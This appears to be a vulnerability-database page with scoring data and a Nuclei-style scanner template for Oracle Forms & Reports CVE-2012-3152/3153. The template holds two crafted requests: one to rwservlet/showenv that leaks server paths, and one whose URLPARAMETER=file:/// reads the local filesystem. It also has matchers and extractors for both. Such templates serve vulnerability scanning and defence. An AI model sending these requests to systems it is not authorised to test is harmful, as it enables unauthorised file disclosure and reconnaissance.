5.8 Medium
AI Score
Confidence
Low
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
0.974 High
EPSS
Percentile
99.9%
An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
id: CVE-2012-3153
info:
name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)
author: Sid Ahmed MALAOUI @ Realistic Security
severity: medium
description: |
An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,
11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown
vectors related to Report Server Component.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
remediation: |
Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
- https://www.exploit-db.com/exploits/31737
- https://www.oracle.com/security-alerts/cpuoct2012.html
- http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
- http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
cvss-score: 6.4
cve-id: CVE-2012-3153
cwe-id: NVD-CWE-noinfo
epss-score: 0.95986
epss-percentile: 0.99354
cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: oracle
product: fusion_middleware
tags: cve,cve2012,oracle,rce,edb
http:
- method: GET
path:
- "{{BaseURL}}/reports/rwservlet/showenv"
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Reports Servlet")'
- type: dsl
dsl:
- '!contains(body_2, "<html")'
- '!contains(body_2, "<HTML")'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: windows_working_path
regex:
- ".?.?\\\\.*\\\\showenv"
- type: regex
name: linux_working_path
regex:
- "/.*/showenv"
# digest: 490a004630440220313eb38f60fc28f0dce1be3540aaf746cf4c91263f5b48bb9c708d4edec787fb02206c7774b898dcf56316c62f0315acb6ed2b6061ab7dc8146523fb664c34e69ffa:922c64590222798bb761d5b6d8e72950